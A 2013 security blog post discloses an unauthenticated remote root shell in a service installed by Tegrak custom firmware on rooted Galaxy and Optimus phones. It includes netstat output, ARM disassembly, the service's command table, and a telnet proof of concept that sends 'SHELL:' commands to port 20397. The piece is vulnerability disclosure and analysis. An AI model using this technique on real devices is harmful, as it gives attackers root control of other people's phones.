Skip to content

Owning Tegrak-rom-rooted mobile device phones (Galaxy and Optimus)

February 22, 2013

Tegrak(http://pspmaster.tistory.com) is a most popular rooting community for android OS in Korea. They mostly focus on Samsung Galaxy Devices but also provide customized firmwares for LG Optimus devices. As Tegrak is very known here, many korean galaxy users do rooting their phones by tegrak customized firmwares.

Tegrak installs customized firmwares on users’ mobile phones. The problem is Tegrak puts some special sauce on the devices as well. They install and run some custom binaries and one of them opens a TCP socket. Let’s see which binary is having the socket.

 

# netstat -anp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:7777 0.0.0.0:* LISTEN 196/sec-ril
tcp 0 0 127.0.0.1:7203 0.0.0.0:* LISTEN 196/sec-ril
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN 195/rild
tcp 0 0 0.0.0.0:20397 0.0.0.0:* LISTEN 3938/tegrak_service

 

You can see the ‘tegrak_service’ process and it has a socket which is listening on TCP port 20397. Let me check out the binary path.

 

# head -n 1 /proc/3938/maps
00008000-0001a000 r-xp 00000000 00:01 1234 /tegrak/bin/tegrak_service

 

Now, it’s time to fire up IDA and open the binary. As this is a simple security issue, I’ll just go to the spots directly.

 

.text:0000C4CC sub_C4CC                                ; CODE XREF: .text:loc_167FCj
.text:0000C4CC                                         ; DATA XREF: .text:loc_167FCo ...
.text:0000C4CC
.text:0000C4CC var_4BC         = -0x4BC
.text:0000C4CC sock_fd         = -0x4B8
.text:0000C4CC var_4B4         = -0x4B4
.text:0000C4CC var_4B0         = -0x4B0
.text:0000C4CC var_4AC         = -0x4AC
.text:0000C4CC
.text:0000C4CC                 PUSH    {R4-R7,LR}
.text:0000C4CE                 LDR     R3, =(dword_1A4FC - 0xC4D8)
.text:0000C4D0                 LDR     R4, =0xFFFFFFA4
.text:0000C4D2                 LDR     R5, =0xFFFFFB54
.text:0000C4D4                 ADD     R3, PC ; dword_1A4FC
.text:0000C4D6                 LDR     R1, [R3,R4]
.text:0000C4D8                 LDR     R2, =0x4A4
.text:0000C4DA                 ADD     SP, R5
.text:0000C4DC                 LDR     R0, [R1]
.text:0000C4DE                 ADD     R2, SP
.text:0000C4E0                 STR     R0, [R2]
.text:0000C4E2                 BL      sub_BCD8
.text:0000C4E6                 MOVS    R0, #2
.text:0000C4E8                 MOVS    R1, #1
.text:0000C4EA                 MOVS    R2, #0
.text:0000C4EC                 BLX     mySocketCall
.text:0000C4F0                 MOVS    R3, R0
.text:0000C4F2                 STR     R0, [SP,#0x4C0+sock_fd]
.text:0000C4F4                 ADDS    R3, #1
.text:0000C4F6                 BNE     loc_C4FE
.text:0000C4F8                 LDR     R0, =(aSocket - 0xC4FE)
.text:0000C4FA                 ADD     R0, PC          ; "socket"
.text:0000C4FC                 B       loc_C546
.text:0000C4FE                 LDR     R4, =0x414
.text:0000C500                 MOVS    R1, #0
.text:0000C502                 MOVS    R2, #0x6E
.text:0000C504                 ADD     R4, SP
.text:0000C506                 MOVS    R0, R4
.text:0000C508                 BLX     sub_8678
.text:0000C50C                 LDR     R6, =0x484
.text:0000C50E                 LDR     R1, =(aDevSocketTegra - 0xC51C)
.text:0000C510                 LDR     R0, =0x416
.text:0000C512                 MOVS    R2, #1
.text:0000C514                 ADD     R6, SP
.text:0000C516                 STRH    R2, [R4]
.text:0000C518                 ADD     R1, PC          ; "/dev/socket/tegrak_service"
.text:0000C51A                 MOVS    R2, #0x6B
.text:0000C51C                 ADD     R0, SP
.text:0000C51E                 LDR     R7, =0xFFFFAD4F
.text:0000C520                 BL      sub_12D08
.text:0000C524                 MOVS    R1, #0
.text:0000C526                 MOVS    R2, #0x10
.text:0000C528                 MOVS    R0, R6
.text:0000C52A                 BLX     sub_8678
.text:0000C52E                 MOVS    R3, #2
.text:0000C530                 STRH    R3, [R6]
.text:0000C532                 STRH    R7, [R6,#2]
.text:0000C534                 LDR     R0, [SP,#0x4C0+sock_fd]
.text:0000C536                 MOVS    R1, R6
.text:0000C538                 MOVS    R2, #0x6E
.text:0000C53A                 BLX     myBindCall

 

The binary has no symbol, so, mySocketCall() and myBindCall() are changed by me. The port number is 20397. We should make sure that this bind function takes the port number. You look at 0x0000C51E and 0x0000C532. It moves 0xAD4F to [R6+2] which points to the port number what bind() is going to use. And 0xAD4F should be 0x4FAD, and 0x4FAD is 20397 in Decimal. We got it.

We’ll see myBindCall()

 

.text:000082C0 myBindCall                              ; CODE XREF: sub_C4CC+6Ep
.text:000082C0                 STMFD   SP!, {R4,R7}
.text:000082C4                 LDR     R7, =0x11A
.text:000082C8                 SVC     0
.text:000082CC                 LDMFD   SP!, {R4,R7}
.text:000082D0                 MOVS    R0, R0
.text:000082D4                 BXPL    LR
.text:000082D8                 B       sub_16804
.text:000082D8 ; End of function myBindCall

 

At 0x000082C4, the code sets R7 to 0x11A. We know that R7 takes a system call number on ARM and 0x11A is the bind system call number. So, it’s clear that this function is for calling the bind system call.

This program has normal behaviors that network based programs do something like socket()-bind()-accept(). And it goes to recv() and handles the user-provided buffer. The handler function is myParseUserCommand() which is changed by me as well.

 

.text:0000C5DA                 STRB    R0, [R5,R4]
.text:0000C5DC                 MOVS    R1, R5
.text:0000C5DE                 MOVS    R0, R6
.text:0000C5E0                 BL      sub_D8F4
.text:0000C5E4                 MOVS    R1, R5
.text:0000C5E6                 LDR     R0, [SP,#0x4C0+var_4BC]
.text:0000C5E8                 BL      myParseUserCommand

 

I’ll skip explaining the whole function, however, myParseUserCommand() function is very predictable. It tries to compare the user buffer (command) to values of an array and jumps to a routine if it is matched. And the array looks like

 

.data:0001A538 ; _DWORD dword_1A538[26]
.data:0001A538 dword_1A538     DCD 0, 0x17997, 1, 0x17685, 2, 0x1799E, 5, 0x179AB, 6
.data:0001A538                                         ; DATA XREF: .got:0001A4A4o
.data:0001A538                 DCD 0x179BC, 7, 0x179CE, 8, 0x179D4, 0xC, 0x179E7, 0xD
.data:0001A538                 DCD 0x179FB, 0x11, 0x1781D, 0x12, 0x17845, 0x13, 0x17A0E

 

Here you have the “address: value” pairs.

0x17997: UNKOWN
0x17685: TEGRAK_KERNEL
0x1799E: CHECK_LAGFIX
0x179AB: ENABLE_SUPERUSER
0x179BC: DISABLE_SUPERUSER
0x179CE: SHELL
0x179D4: CHECK_CACHE_LAGFIX
0x179E7: CHECK_SYSTEM_LAGFIX
0x179FB: CHECK_ONENAND_MODE
0x1781D: TEGRAK_KERNEL_SUB_VERSION
0x17845: TEGRAK_KERNEL_MODEL_NAME
0x17A0E: SYSTEM_APP_REMOVE

 

It’s obvious that you’re pop-eyed when you see “SHELL” in anywhere. You can picture that there is a routine for the “SHELL” command and it executes your command. There is a parsing code for your buffer, but, i’d skip it as it’s really simple. Let me show you PoC directly.

I’m testing on Samsung Galaxy S2 rooted by Tegrak. The mobile device has 10.0.1.17 as its ip address.

 

$ telnet 10.0.1.17 20397
Trying 10.0.1.17…
Connected to 10.0.1.17.
Escape character is ‘^]’.
TESTGOGOGO
ERROR:UNKOWN:unkown command.
SHELL:mkdir /data/local/tmp/beist_poc
OK:SHELL:mkdir /data/local/tmp/beist_poc
^]
telnet> close
Connection closed.

 

Bold-Italic-Brown color text are my input. You should put your command after “SHELL:” that you want to execute on the device. Let’s see what happens in /data/local/tmp directory.

 

# ls -al /data/local/tmp
total 10700
drwxrwx–x 5 2000 2000 4096 Feb 22 11:08 .
drwxrwx–x 4 2000 2000 4096 Jan 2 1970 ..
-rwxrwxrwx 1 0 0 439013 Jan 28 21:07 arm_rsh
drwxrwxrwx 2 0 0 4096 Feb 22 11:08 beist_poc
-rwxr-xr-x 1 0 0 1096224 Dec 11 16:56 busybox_arm
-rwxrwxrwx 1 0 0 4252764 Mar 1 2009 gdb

 

I think popping-up calc.exe would be more l33t, but, we see the “beist_poc” directory has created, anyway.

The thing is tegrak_service process is running as ‘root’ that means you can do whatever you want on the target devices. Moreover, even though I’ve tested this issue only on Samsung Galaxy S2, but, it’s very possible that it’ll be working on the latest samsung galaxy rooted by tegrak firmwares. Because I’ve not seen any report regarding to this issue.

Actually I have Galaxy S3 and Galaxy Note2, but, those are used for my research, and i won’t try to do anything that could mess them up. :) So, if you have Galaxy S3 with tegrak-rooted, please check this issue out and let us know.

By the way, I don’t think this is a backdoor by the tegrak developer. Because if the tegrak developer really wanted to make a backdoor, he’d probably take a better way as he can fully control the firmware. I guess he just didn’t expect someone like me who may try to dig something on every software. :)

Again, as tegrak is very popular in korea, there are really many people who do rooting their phones using tegrak-firmwares. This is a critical security issue and i highly recommend you delete the /tegrak/bin/tegrak_service file. This is not a solution, but, better than nothing until the tegrak developer fixes this issue.

Cheers.

 

Advertisements

From → Security Misc

4 Comments
  1. Oops, it’s bad but it’s confirmed that this issue is happened on the lastest galaxy devices rooted by tegrak. Just tested on my galaxy note 2.

  2. Anonymous permalink

    nice work finding it, but is tegrak only used in korea?

    • Anonymous permalink

      If you submit the firmware to tegrak maker, he will give you modified firmware!

  3. Don’t blindly!We must believe ourself.
    bloger http://www.board-x.com/bin/ngpzltm.asp

댓글을 남겨주세요.

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: